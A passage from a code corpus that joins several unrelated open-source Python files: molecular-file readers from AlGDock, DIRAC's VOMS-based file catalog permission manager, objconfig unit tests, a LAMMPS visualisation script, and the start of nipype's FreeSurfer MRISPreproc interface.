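#   io_crd.write('ligand.mdcrd', confs, trajectory=True, multiplier=10.)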
class dock6_mol2:
"""Handles mol2 from UCSF DOCK 6
Reads output files and writes similar mol2 files
"""
def __init__(self):
pass
def read(self, FN, reorder=None, multiplier=None):
confs = []
E = {}
if (FN is None) or (not os.path.isfile(FN)):
return (confs, E)
# Specifically to read output from UCSF dock6
if FN.endswith('.mol2'):
mol2F = open(FN, 'r')
elif FN.endswith('.mol2.gz'):
import gzip
mol2F = gzip.open(FN, 'r')
else:
raise Exception('Unknown file type')
models = mol2F.read().strip().split('########## Name:')
mol2F.close()
models.pop(0)
if len(models) > 0:
for line in models[0].split('\n'):
if line.startswith('##########'):
label = line[11:line.find(':')].strip()
E[label] = []
for model in models:
fields = model.split('<TRIPOS>')
conf = np.array([l.split()[2:5] for l in fields[2].split('\n')[1:-1]],
dtype=float)
if multiplier is not None:
conf = multiplier * conf
if reorder is not None:
conf = conf[reorder, :]
for line in fields[0].split('\n'):
if line.startswith('##########'):
label = line[11:line.find(':')].strip()
if not label in E.keys():
E[label] = [0] * len(confs)
E[label].append(float(line.split()[-1]))
confs.append(conf)
return (confs, E)
def write(self, templateFN, confs, FN, reorder=None, multiplier=None):
if (templateFN is None) or not os.path.isfile(templateFN):
raise Exception('Template required')
# Read the first model from the template
if templateFN.endswith('.mol2'):
mol2F = open(templateFN, 'r')
elif templateFN.endswith('.mol2.gz'):
import gzip
mol2F = gzip.open(templateFN, 'r')
else:
raise Exception('Template for mol2 is unknown file type')
template = mol2F.read().strip()
mol2F.close()
if template.find('########## Name:') > -1:
template = template.split('########## Name:')[1]
template = template[template.find('@<TRIPOS>'):]
header = template[template.find('@<TRIPOS>MOLECULE'
):template.find('@<TRIPOS>ATOM') + 14]
body = template[template.find('@<TRIPOS>ATOM') +
14:template.find('\n@<TRIPOS>BOND')].split('\n')
footer = template[template.find('\n@<TRIPOS>BOND'):] + '\n'
F = open(FN, 'w')
for conf in confs:
if multiplier is not None:
conf = multiplier * conf
if reorder is not None:
conf = conf[reorder, :]
F.write(header + \
'\n'.join([body[ind][:16] + \
''.join(['%10.4f'%x for x in conf[ind]]) + \
body[ind][46:] for ind in range(len(body))]) \
+ footer)
F.close()
class dcd:
"""
Class to write DCD files
"""
def __init__(self, molecule, ligand_atom_order=None, \
receptorConf=None, ligand_first_atom=0):
self.molecule = molecule
self.receptorConf = receptorConf
self.ligand_first_atom = ligand_first_atom
if ligand_atom_order is None:
self.ligand_atom_order = range(len(self.molecule.atoms))
else:
self.ligand_atom_order = ligand_atom_order
pass
def write(self,
FN,
confs,
includeLigand=True,
includeReceptor=False,
factor=10.0,
delta_t=0.1):
"""
Writes a DCD file for a trajectory.
If includeReceptor==True, the receptor coordinates are included.
"""
import MMTK
import MMTK_DCD # @UnresolvedImport
from Scientific import N
if not isinstance(confs, list):
confs = [confs]
if includeReceptor and (self.receptorConf is None):
raise Exception("Missing receptor configuration")
n_atoms = 0
if includeReceptor:
receptor_x0 = factor * self.receptorConf[:self.ligand_first_atom, 0]
receptor_y0 = factor * self.receptorConf[:self.ligand_first_atom, 1]
receptor_z0 = factor * self.receptorConf[:self.ligand_first_atom, 2]
receptor_x1 = factor * self.receptorConf[self.ligand_first_atom:, 0]
receptor_y1 = factor * self.receptorConf[self.ligand_first_atom:, 1]
receptor_z1 = factor * self.receptorConf[self.ligand_first_atom:, 2]
n_atoms += self.receptorConf.shape[0]
if includeLigand:
n_atoms += len(self.molecule.atoms)
n_snaps = len(confs)
fd = MMTK_DCD.writeOpenDCD(FN, n_atoms, n_snaps, 1, 1, delta_t)
if includeReceptor and includeLigand:
for array in confs:
array = factor * array
x = N.concatenate(
(receptor_x0, N.take(array[:, 0], self.ligand_atom_order),
receptor_x1)).astype(N.Float16)
y = N.concatenate(
(receptor_y0, N.take(array[:, 1], self.ligand_atom_order),
receptor_y1)).astype(N.Float16)
z = N.concatenate(
(receptor_z0, N.take(array[:, 2], self.ligand_atom_order),
receptor_z1)).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
elif includeLigand:
for array in confs:
array = factor * array
x = N.take(array[:, 0], self.ligand_atom_order).astype(N.Float16)
y = N.take(array[:, 1], self.ligand_atom_order).astype(N.Float16)
z = N.take(array[:, 2], self.ligand_atom_order).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
else:
x = N.concatenate((receptor_x0, receptor_x1)).astype(N.Float16)
y = N.concatenate((receptor_y0, receptor_y1)).astype(N.Float16)
z = N.concatenate((receptor_z0, receptor_z1)).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
class prmtop:
"""
Class to read AMBER prmtop files
"""
def __init__(self):
pass
def read(self, FN, varnames=['RESIDUE_LABEL', 'RESIDUE_POINTER']):
"""
Reads an AMBER prmtop file, returning a dictionary
"""
if not os.path.isfile(FN):
raise Exception('prmtop file %s does not exist!' % FN)
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'r')
else:
F = open(FN, 'r')
data = F.read().split('%FLAG ')
F.close()
prmtop = {}
for record in data:
name = record[:record.find('\n')].strip()
if name in varnames:
prmtop[name] = self._load_record(record)
return prmtop
def _load_record(self, record):
items = []
lines = record.split('\n')
lines.pop(0) # Name
FORMAT = lines.pop(0).strip()[8:-1] # Format
if FORMAT.find('a') > -1: # Text
w = int(FORMAT[FORMAT.find('a') + 1:])
for line in lines:
items = items + [line[x:x + w] for x in range(0, len(line), w)]
return np.array(items)
elif FORMAT.find('I') > -1: # Integer
w = int(FORMAT[FORMAT.find('I') + 1:])
for line in lines:
items = items + [int(line[x:x + w]) for x in range(0, len(line), w)]
return np.array(items, dtype=int)
elif FORMAT.find('E') > -1: # Scientific
w = int(FORMAT[FORMAT.find('E') + 1:FORMAT.find('.')])
for line in lines:
items = items + [float(line[x:x + w]) for x in range(0, len(line), w)]
return np.array(items, dtype=float)
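# Example of the record layout this parser expects (hypothetical values):
#   %FLAG RESIDUE_POINTER
#   %FORMAT(10I8)
#          1      25      47
# With w = 8 this parses into np.array([1, 25, 47], dtype=int).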
|
CCBatIIT/AlGDock
|
AlGDock/IO.py
|
Python
|
mit
| 17,074
|
[
"Amber",
"NetCDF",
"VMD"
] |
cdb57cea45c3deef4bc7e8a47bd9a960a63502dbb09b7b060a10a178856a7283
|
""" VOMSSecurityManager class implements access permissions based on VOMS roles
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import datetime
from DIRAC import S_OK, S_ERROR
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getAllGroups, getGroupOption
from DIRAC.DataManagementSystem.DB.FileCatalogComponents.SecurityManager.SecurityManagerBase \
import SecurityManagerBase, _readMethods, _writeMethods
from DIRAC.Core.Utilities.ReturnValues import returnSingleResult
class VOMSSecurityManager(SecurityManagerBase):
""" This class implements a 3-level POSIX permission, wrapping up
the DIRAC group into VOMS roles
"""
def __init__(self, database=False):
super(VOMSSecurityManager, self).__init__(database=database)
# voms role : [dirac groups that have it]
self.vomsRoles = {}
# dirac group : voms role it has
self.diracGroups = {}
# Lifetime of the info in the two dictionaries
self.CACHE_TIME = datetime.timedelta(seconds=600)
self.__buildRolesAndGroups()
def __buildRolesAndGroups(self):
""" Rebuild the cache dictionary for VOMS roles and DIRAC Groups"""
self.lastBuild = datetime.datetime.now()
allGroups = getAllGroups()
for grpName in allGroups:
vomsRole = getGroupOption(grpName, 'VOMSRole')
if vomsRole:
self.diracGroups[grpName] = vomsRole
self.vomsRoles.setdefault(vomsRole, []).append(grpName)
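# After __buildRolesAndGroups the two caches might look like, e.g.
# (hypothetical configuration):
#   self.diracGroups = {'vo_user': '/vo/Role=user', 'vo_prod': '/vo/Role=production'}
#   self.vomsRoles = {'/vo/Role=user': ['vo_user'], '/vo/Role=production': ['vo_prod']}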
def __getVomsRole(self, grpName):
""" Returns the VOMS role of a given DIRAC group
:param grpName:
:returns: VOMS role, or None
"""
if (datetime.datetime.now() - self.lastBuild) > self.CACHE_TIME:
self.__buildRolesAndGroups()
return self.diracGroups.get(grpName)
def __getDiracGroups(self, vomsRole):
""" Returns all the DIRAC groups that have a given VOMS role
:param vomsRole:
:returns: list of groups, empty if not exist
"""
if (datetime.datetime.now() - self.lastBuild) > self.CACHE_TIME:
self.__buildRolesAndGroups()
return self.vomsRoles.get(vomsRole, [])
def __shareVomsRole(self, grpName, otherGrpName):
""" Returns True if the two DIRAC groups have the same VOMS role"""
vomsGrp = self.__getVomsRole(grpName)
vomsOtherGrp = self.__getVomsRole(otherGrpName)
# The voms group cannot be None
return vomsGrp and vomsOtherGrp and (vomsGrp == vomsOtherGrp)
def __isNotExistError(self, errorMsg):
""" Returns true if the errorMsg means that the file/directory does not exist """
for possibleMsg in ['not exist', 'not found', 'No such file or directory']:
if possibleMsg in errorMsg:
return True
return False
def __getFilePermission(self, path, credDict, noExistStrategy=None):
""" Checks POSIX permission for a file using the VOMS roles.
That is, if the owner group of the file shares the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
:param path : file path (string)
:param credDict : credential of the user
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
if not path:
return S_ERROR('Empty path')
# We check what is the group stored in the DB for the given path
res = returnSingleResult(self.db.fileManager.getFileMetadata([path]))
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# From now on, we know that the error is due to the file not existing
# If we have no strategy regarding non existing files, then just return the error
if noExistStrategy is None:
return res
# Finally, follow the strategy
return S_OK(dict.fromkeys(['Read', 'Write', 'Execute'], noExistStrategy))
#===========================================================================
# # This does not seem necessary since we add the OwnerGroup in the query behind the scene
# origGrp = 'unknown'
# res = self.db.ugManager.getGroupName( res['Value']['GID'] )
# if res['OK']:
# origGrp = res['Value']
#===========================================================================
origGrp = res['Value'].get('OwnerGroup', 'unknown')
# If the two group share the same voms role, we do the query like if we were
# the group stored in the DB
if self.__shareVomsRole(credDict.get('group', 'anon'), origGrp):
credDict = {'username': credDict.get('username', 'anon'), 'group': origGrp}
return returnSingleResult(self.db.fileManager.getPathPermissions([path], credDict))
def __testPermissionOnFile(self, paths, permission, credDict, noExistStrategy=None):
""" Tests a permission on a list of files
:param path : list/dict of file paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
:returns: Successful dictionary with True or False, and Failed.
"""
successful = {}
failed = {}
for filename in paths:
res = self.__getFilePermission(filename, credDict, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[filename] = res['Message']
else:
successful[filename] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __getDirectoryPermission(self, path, credDict, recursive=True, noExistStrategy=None):
""" Checks POSIX permission for a directory using the VOMS roles.
That is, if the owner group of the directory share the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
:param path : directory path (string)
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
if not path:
return S_ERROR('Empty path')
# We check what is the group stored in the DB for the given path
res = self.db.dtree.getDirectoryParameters(path)
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# Very special case to allow creation of very first entry
if path == '/':
return S_OK({'Read': True, 'Write': True, 'Execute': True})
# From now on, we know that the error is due to the directory not existing
# If recursive, we try the parent directory
if recursive:
return self.__getDirectoryPermission(os.path.dirname(path), credDict,
recursive=recursive, noExistStrategy=noExistStrategy)
# From now on, we know we don't run recursive
# If we have no strategy regarding non existing directories, then just return the error
if noExistStrategy is None:
return res
# Finally, follow the strategy
return S_OK(dict.fromkeys(['Read', 'Write', 'Execute'], noExistStrategy))
# The directory exists.
origGrp = res['Value']['OwnerGroup']
# If the two group share the same voms role, we do the query like if we were
# the group stored in the DB
if self.__shareVomsRole(credDict.get('group', 'anon'), origGrp):
credDict = {'username': credDict.get('username', 'anon'), 'group': origGrp}
return self.db.dtree.getDirectoryPermissions(path, credDict)
def __testPermissionOnDirectory(self, paths, permission, credDict, recursive=True, noExistStrategy=None):
""" Tests a permission on a list of directories
:param path : list/dict of directory paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True or False, and Failed.
"""
successful = {}
failed = {}
for dirName in paths:
res = self.__getDirectoryPermission(dirName, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[dirName] = res['Message']
else:
successful[dirName] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __testPermissionOnParentDirectory(self, paths, permission, credDict, recursive=True, noExistStrategy=None):
""" Tests a permission on the parents of a list of directories
:param path : directory path (string)
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True or False, and Failed.
"""
parentDirs = {}
for path in paths:
parentDirs.setdefault(os.path.dirname(path), []).append(path)
res = self.__testPermissionOnDirectory(parentDirs, permission, credDict,
recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
parentAllowed = res['Value']['Successful']
for parentName in parentAllowed:
isParentAllowed = parentAllowed[parentName]
for path in parentDirs[parentName]:
successful[path] = isParentAllowed
return S_OK({'Successful': successful, 'Failed': failed})
def __getFileOrDirectoryPermission(self, path, credDict, recursive=False, noExistStrategy=None):
""" Checks POSIX permission for a directory or file using the VOMS roles.
That is, if the owner group of the directory or file shares the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
We first consider the path as a file, and if it does not exist, we consider it as a directory.
:param path : directory or file path (string)
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
# First consider it as File
# We want to know whether the file does not exist, so we force noExistStrategy to None
res = self.__getFilePermission(path, credDict, noExistStrategy=None)
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# From now on, we know that the error is due to the File not existing
# We Try then the directory method, since path can be a directory
# The noExistStrategy will be applied by __getDirectoryPermission, so we don't need to do it ourselves
res = self.__getDirectoryPermission(path, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
return res
def __testPermissionOnFileOrDirectory(self, paths, permission, credDict, recursive=False, noExistStrategy=None):
""" Tests a permission on a list of files or directories.
:param path : list/dict of directory or files paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True or False, and Failed.
"""
successful = {}
failed = {}
for path in paths:
res = self.__getFileOrDirectoryPermission(path, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[path] = res['Message']
else:
successful[path] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __policyRemoveDirectory(self, paths, credDict):
""" Tests whether the remove operation on directories
is permitted.
Removal of non existing directory is always allowed.
For existing directories, we must have the write permission
on the parent
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
successful = {}
# We allow removal of all the non existing directories
res = self.db.dtree.exists(paths)
if not res['OK']:
return res
nonExistingDirectories = set(path for path in res['Value']['Successful'] if not res['Value']['Successful'][path])
existingDirs = set(paths) - set(nonExistingDirectories)
for dirName in nonExistingDirectories:
successful[dirName] = True
res = self.__testPermissionOnParentDirectory(existingDirs, 'Write', credDict, recursive=False)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def __policyRemoveFile(self, paths, credDict):
""" Tests whether the remove operation on files
is permitted.
Removal of non existing file is always allowed.
For existing files, we must have the write permission
on the parent
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
successful = {}
# We allow removal of all the non existing files
res = self.db.fileManager.exists(paths)
if not res['OK']:
return res
nonExistingFiles = set(path for path in res['Value']['Successful'] if not res['Value']['Successful'][path])
existingFiles = set(paths) - set(nonExistingFiles)
for dirName in nonExistingFiles:
successful[dirName] = True
res = self.__testPermissionOnParentDirectory(existingFiles, 'Write', credDict, recursive=False)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def __policyListDirectory(self, paths, credDict):
""" Test Read permission on the directory.
If the directory does not exist, we do not allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnDirectory(paths, 'Read', credDict,
recursive=True)
def __policyReadForFileAndDirectory(self, paths, credDict):
""" Testing the read bit on the parent directory,
be it a file or a directory.
So it reads permissions from a directory
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnParentDirectory(paths, 'Read', credDict,
recursive=True)
def __policyWriteForFileAndDirectory(self, paths, credDict):
""" Testing the read bit on the parent directory (recursively),
be it a file or a directory.
So it reads permissions from a directory
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnParentDirectory(paths, 'Write', credDict,
recursive=True)
def __policyReadForReplica(self, paths, credDict):
""" Test Read permission on the file associated to the replica.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Read', credDict,
noExistStrategy=True)
def __policyWriteForReplica(self, paths, credDict):
""" Test Write permission on the file associated to the replica.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Write', credDict,
noExistStrategy=True)
def __policyWriteOnFile(self, paths, credDict):
""" Test Write permission on the file.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Write', credDict,
noExistStrategy=True)
def __policyChangePathMode(self, paths, credDict):
""" Test Write permission on the directory/file.
If the directory/file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return self.__testPermissionOnFileOrDirectory(paths, 'Write', credDict,
recursive=False, noExistStrategy=True)
def __policyDeny(self, paths, credDict):
""" Denies the access to all the paths given
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True or False, and Failed.
"""
return S_OK({'Successful': dict.fromkeys(paths, False), 'Failed': {}})
def hasAccess(self, opType, paths, credDict):
""" Checks whether a given operation on given paths is permitted
:param opType: name of the operation (the FileCatalog methods in fact...)
:param paths: list/dictionary of path on which we want to apply the operation
:param credDict: credential of the users (with at least username, group and properties)
:returns: Successful dict with True or False, and Failed dict. In fact, it is not necessarily
a boolean, rather an int (binary operation results)
"""
# Check if admin access is granted first
result = self.hasAdminAccess(credDict)
if not result['OK']:
return result
if result['Value']:
# We are admin, allow everything
return S_OK({'Successful': dict.fromkeys(paths, True), 'Failed': {}})
if opType not in _readMethods + _writeMethods:
return S_ERROR("Operation type not known %s" % opType)
if self.db.globalReadAccess and (opType in _readMethods):
return S_OK({'Successful': dict.fromkeys(paths, True), 'Failed': {}})
policyToExecute = None
if opType == 'removeDirectory':
policyToExecute = self.__policyRemoveDirectory
elif opType in ['createDirectory', 'addFile']:
policyToExecute = self.__policyWriteForFileAndDirectory
elif opType == 'removeFile':
policyToExecute = self.__policyRemoveFile
elif opType in ['addFileAncestors', 'setFileStatus', 'addReplica',
'removeReplica', 'setReplicaStatus', 'setReplicaHost']:
policyToExecute = self.__policyWriteOnFile
elif opType == 'listDirectory':
policyToExecute = self.__policyListDirectory
elif opType in ['isDirectory', 'getDirectoryReplicas', 'getDirectoryMetadata', 'getDirectorySize',
'isFile', 'getFileSize', 'getFileMetadata', 'exists',
'getFileAncestors', 'getFileDescendents']:
policyToExecute = self.__policyReadForFileAndDirectory
elif opType in ['getReplicas', 'getReplicaStatus']:
policyToExecute = self.__policyReadForReplica
# Only admin can do that, and if we are here, we are not admin
elif opType in ['changePathOwner', 'changePathGroup']:
policyToExecute = self.__policyDeny
elif opType == 'changePathMode':
policyToExecute = self.__policyChangePathMode
if not policyToExecute:
return S_ERROR("No policy matching operation %s" % opType)
res = policyToExecute(paths, credDict)
return res
def getPathPermissions(self, paths, credDict):
""" This method is meant to disappear, hopefully soon,
but as long as we have clients from versions < v6r14,
we need a getPathPermissions method. Since it does not make
sense with that kind of fine grain policy, we return what used to
be returned...
"""
return super(VOMSSecurityManager, self).getPathPermissions(paths, credDict)
|
yujikato/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/SecurityManager/VOMSSecurityManager.py
|
Python
|
gpl-3.0
| 23,076
|
[
"DIRAC"
] |
a744f9e153c1373774c7340ad63af7ebb5bf243202157303db55703f65f282b5
|
"""
Test objconfig.Config
"""
import pytest
from objconfig.exception import RuntimeException
from objconfig.exception import InvalidArgumentException
from objconfig import Config
def test_empty_instantiation():
try:
config = Config({})
except Exception:
assert False, "Empty Dictionary Instantiation Failed"
def test_normal_instantiation():
try:
config = Config({'spam': 'eggs'})
except Exception:
assert False, "Dictionary Instantiation Failed"
def test_with_config_instantiation():
try:
embed = Config({'spam': 'eggs'})
config = Config({'brian': embed})
except Exception:
assert False, "Instantiation With Config Failed"
assert config.brian.spam == 'eggs', "Instantiation With Config Failed"
def test_improper_instantiation():
with pytest.raises(InvalidArgumentException):
config = Config(['not', 'a', 'dictionary'])
def test_copy_config():
l = [1,2,3,4,5]
firstconfig = Config({'l': l})
secondconfig = firstconfig.copy()
l[0] = 6
assert secondconfig.l[0] == 1, "Config Not Deep Copied"
def test_setattr_getattr_config():
config = Config({}, allowModifications=True)
config.spam = 'eggs'
assert config.spam == 'eggs', "Config __setattr__/__getattr__ Not Working"
def test_len_config():
config = Config({'life': 'brian', 'spam': 'eggs'})
assert len(config) == 2, "Config __len__ Not Working"
def test_iter_config():
testagainst = {}
config = Config({'life': 'brian', 'spam': 'eggs'})
for key, value in config:
testagainst[key] = value
assert {'life': 'brian', 'spam': 'eggs'} == testagainst, "Config __iter__ Not Working"
def test_itemmethods_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}}, allowModifications=True)
assert config['life'] == 'brian', "Config __getitem__ Not Working"
config['spam']['ham'] = 'eggs'
assert config['spam']['ham'] == 'eggs', "Config __setitem__ Not Working"
del config['life']
assert {'spam': {'ham': 'eggs'}} == config.toArray(), "Config __delitem__ Not Working"
config.setReadOnly()
with pytest.raises(RuntimeException):
config['spam']['ham'] = 'foo'
with pytest.raises(InvalidArgumentException):
del config['spam']
def test_toArray_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
assert {'life': 'brian', 'spam': {'ham': 'rabbit'}} == config.toArray(), "Config toArray Not Working"
def test_isReadOnly_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
assert config.isReadOnly(), "Config isReadOnly Not Working"
def test_merge_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
merge = Config({'life': 'meaning', 'spam': {'ham': 'killer', 'new': 'ni'}})
config.merge(merge)
assert isinstance(config.spam, Config), "Config merge Not Working"
assert {'life': 'meaning', 'spam': {'ham': 'killer', 'new': 'ni'}} == config.toArray(), "Config merge Not Working"
|
asherwunk/objconfig
|
tests/test_config.py
|
Python
|
mit
| 3,046
|
[
"Brian"
] |
b8dfc28633fbc87d4382d790d704b9f91e51385983973f2f9bf28e57182ac643
|
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# viz_gl.py
# Purpose: viz running LAMMPS simulation via GL tool in Pizza.py
# Syntax: viz_gl.py in.lammps Nfreq Nsteps
# in.lammps = LAMMPS input script
# Nfreq = dump and viz shapshot every this many steps
# Nsteps = run for this many steps
import sys
sys.path.append("./pizza")
# parse command line
argv = sys.argv
if len(argv) != 4:
print "Syntax: viz_gl.py in.lammps Nfreq Nsteps"
sys.exit()
infile = sys.argv[1]
nfreq = int(sys.argv[2])
nsteps = int(sys.argv[3])
me = 0
# uncomment if running in parallel via Pypar
#import pypar
#me = pypar.rank()
#nprocs = pypar.size()
from lammps import lammps
lmp = lammps()
# run infile all at once
# assumed to have no run command in it
# dump a file in native LAMMPS dump format for Pizza.py dump tool
lmp.file(infile)
lmp.command("thermo %d" % nfreq)
lmp.command("dump python all atom %d tmp.dump" % nfreq)
# initial 0-step run to generate dump file and image
lmp.command("run 0 pre yes post no")
ntimestep = 0
# wrapper on GL window via Pizza.py gl tool
# just proc 0 handles reading of dump file and viz
if me == 0:
import Tkinter
tkroot = Tkinter.Tk()
tkroot.withdraw()
from dump import dump
from gl import gl
d = dump("tmp.dump",0)
g = gl(d)
d.next()
d.unscale()
g.zoom(1)
g.shift(0,0)
g.rotate(0,270)
g.q(10)
g.box(1)
g.show(ntimestep)
# run nfreq steps at a time w/out pre/post, read dump snapshot, display it
while ntimestep < nsteps:
lmp.command("run %d pre no post no" % nfreq)
ntimestep += nfreq
if me == 0:
d.next()
d.unscale()
g.show(ntimestep)
lmp.command("run 0 pre no post yes")
# uncomment if running in parallel via Pypar
#print "Proc %d out of %d procs has" % (me,nprocs), lmp
#pypar.finalize()
|
slitvinov/lammps-sph-multiphase
|
python/examples/viz_gl.py
|
Python
|
gpl-2.0
| 1,846
|
[
"LAMMPS"
] |
862e020766cc3620da229a6af2bb9a5478bcf1310b4e43aef32b9f9dde0c4913
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The freesurfer module provides basic functions for interfacing with
freesurfer tools.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
__docformat__ = 'restructuredtext'
import os
from ..freesurfer.base import FSCommand, FSTraitedSpec
from ..base import (TraitedSpec, File, traits, InputMultiPath,
OutputMultiPath, Directory, isdefined)
from ...utils.filemanip import fname_presuffix, split_filename
class MRISPreprocInputSpec(FSTraitedSpec):
out_file = File(argstr='--out %s', genfile=True,
desc='output filename')
target = traits.Str(argstr='--target %s', mandatory=True,
desc='target subject name')
hemi = traits.Enum('lh', 'rh', argstr='--hemi %s',
mandatory=True,
desc='hemisphere for source and target')
surf_measure = traits.Str(argstr='--meas %s',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='Use subject/surf/hemi.surf_measure as input')
surf_area = traits.Str(argstr='--area %s',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='Extract vertex area from subject/surf/hemi.surfname to use as input.')
subjects = traits.List(argstr='--s %s...',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='subjects from whom measures are calculated')
fsgd_file = File(exists=True, argstr='--fsgd %s',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='specify subjects using fsgd file')
subject_file = File(exists=True, argstr='--f %s',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='file specifying subjects separated by white space')
surf_measure_file = InputMultiPath(File(exists=True), argstr='--is %s...',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='file alternative to surfmeas, still requires list of subjects')
source_format = traits.Str(argstr='--srcfmt %s', desc='source format')
surf_dir = traits.Str(argstr='--surfdir %s',
desc='alternative directory (instead of surf)')
vol_measure_file = InputMultiPath(traits.Tuple(File(exists=True),
File(exists=True)),
argstr='--iv %s %s...',
desc='list of volume measure and reg file tuples')
proj_frac = traits.Float(argstr='--projfrac %s',
desc='projection fraction for vol2surf')
fwhm = traits.Float(argstr='--fwhm %f',
xor=['num_iters'],
desc='smooth by fwhm mm on the target surface')
num_iters = traits.Int(argstr='--niters %d',
xor=['fwhm'],
desc='niters : smooth by niters on the target surface')
fwhm_source = traits.Float(argstr='--fwhm-src %f',
xor=['num_iters_source'],
desc='smooth by fwhm mm on the source surface')
num_iters_source = traits.Int(argstr='--niterssrc %d',
xor=['fwhm_source'],
desc='niters : smooth by niters on the source surface')
smooth_cortex_only = traits.Bool(argstr='--smooth-cortex-only',
desc='only smooth cortex (ie, exclude medial wall)')
class MRISPreprocOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='preprocessed output file')
class MRISPreproc(FSCommand):
"""Use FreeSurfer mris_preproc to prepare a group of contrasts for
a second level analysis
Examples
--------
>>> preproc = MRISPreproc()
>>> preproc.inputs.target = 'fsaverage'
>>> preproc.inputs.hemi = 'lh'
>>> preproc.inputs.vol_measure_file = [('cont1.nii', 'register.dat'), \
('cont1a.nii', 'register.dat')]
>>> preproc.inputs.out_file = 'concatenated_file.mgz'
>>> preproc.cmdline
